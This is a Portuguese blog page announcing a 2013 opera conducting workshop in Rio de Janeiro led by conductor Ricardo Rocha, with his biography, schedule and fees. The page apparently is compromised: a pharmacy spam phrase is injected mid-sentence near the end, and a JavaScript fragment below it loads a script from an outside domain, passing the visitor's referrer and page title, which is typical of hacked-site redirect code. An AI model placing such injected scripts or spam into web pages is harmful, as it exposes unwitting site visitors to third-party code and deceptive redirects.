LateralNotícia

Cia Bachiana Brasileira

1ª Oficina de Regência de Ópera do Rio de Janeiro, 2013.


SERVIÇO

 

FINEP
Praia do Flamengo, 200, Pilotis – Flamengo

Período: de 13 a 15 de junho de 2013, quinta a sábado

Horários: das 8 às 12h. e das 14 às 17h.

Certificado: pela Sociedade Musical Bachiana Brasileira

Classe: mínima de 12  alunos, com máximo de 6 alunos ativos

Informações e inscrições: cbb.secretaria@gmail.com / (21) 2245-0058

 

O maestro Ricardo Rocha ministrará a 1ª Oficina de Regência de Ópera do Rio de Janeiro, aberta também a cantores. A oficina ocorrerá de 13 a 15 de junho, na FINEP e a obra escolhida foi Cavalleria Rusticana, ópera em um ato de Pietro Mascagni. A pianista é Eliara Puggina.

 

Ricardo Rocha

Possuidor dos títulos de Kapellmeister – o mais alto em Regência na Alemanha -, o de Mestre em Regência pela UFRJ e o de Piano pela E.M. Villa-Lobos, Rocha tem recebido críticas entusiasmadas no Brasil e no exterior.  Em 2010, foi aclamado junto à Cia. Bachiana Brasileira, com o prêmio mais importante do Governo do Estado do Rio de Janeiro na categoria Música Erudita, pelo alto padrão de qualidade com que executa do colonial brasileiro e barroco europeu à música contemporânea. Em 2012, comemorou 30 anos de regência profissional.

Suas gravações contam com mais de 15 concertos para a televisão e rádio, 8 CDs (2 inéditos) e 3 DVDs. Suas montagens à frente do Coro e da Orquestra da Cia. Bachiana Brasileira conquistaram um público fiel, com três delas entre as melhores do ano pelo jornal O Globo, em 2007, 2008 e 2011.

 

Alemanha, Argentina, Brasil

Na Alemanha, Rocha criou e dirigiu por 11 anos (1989 a 2000) o ciclo “Brasilianische Musik im Konzert” para a difusão da música sinfônica brasileira, à frente de orquestras como a Sinfônica de Bamberg, a Filarmônica da Turíngia e outras, regendo também grandes obras do repertório internacional.

Na Argentina, foi regente residente na Orquesta Sinfónica Nacional de Cuyo, em Mendoza; no Brasil, regeu como convidado as orquestras Sinfônica Brasileira, Teatro Municipal de São Paulo, Sinfônica de Minas Gerais, Petrobras Sinfônica e Sinfônica Nacional, tendo sido regente titular das Orquestras Sinfônica da UFMT (Cuiabá) e Escola de Música da UFMG (Belo Horizonte), onde foi Professor de Regência.


Turnê na Ásia

Em outubro de 2009, dirigiu a Orquestra Bachiana Brasileira em apresentações em Hanói e Cingapura, a convite do Departamento Cultural do Ministério das Relações Exteriores, em comemoração ao 50º aniversário do falecimento de Heitor Villa-Lobos.


Atuação como docente

É autor do livro Regência, uma arte complexa (2004), tem classe particular de regência e é professor em cursos livres de extensão, como os do Baukurs Cultural, da Pós-Graduação da Faculdade de São Bento e do Conservatório Brasileiro de Música.

 

Dinâmica de trabalho

Regentes: teórica – Manhã, com pianista a partir das 10h30

Regentes e Cantores: prática – Tarde, com pianista

 

Oficina com cantores

Trabalho direto com regentes e pianista nas árias e partes corais

 

Valores do curs

Regentes (horário integral): R$ 450,00, ativo;

R$ 300,00 ouvinte;

Entrada: R$ 200,00 até 31/05

 

Cantores: (horário da tarde): R$ 300,00, ativo;

R$ 150,00 ouvinte;

Entrada: R$ 100,00 até 31/05

Obs.: Alunos ativos – será necessário o envio de currículo e, opcionalmente, de um vídeo.

 

A avaliação da regência para candidatos a aluno ativo será feita logo no início how to take cialis 10mg das atividades.

 

 

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; d.getElementsByTagName(‘head’)[0].appendChild(s);

Faça seu comentário

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.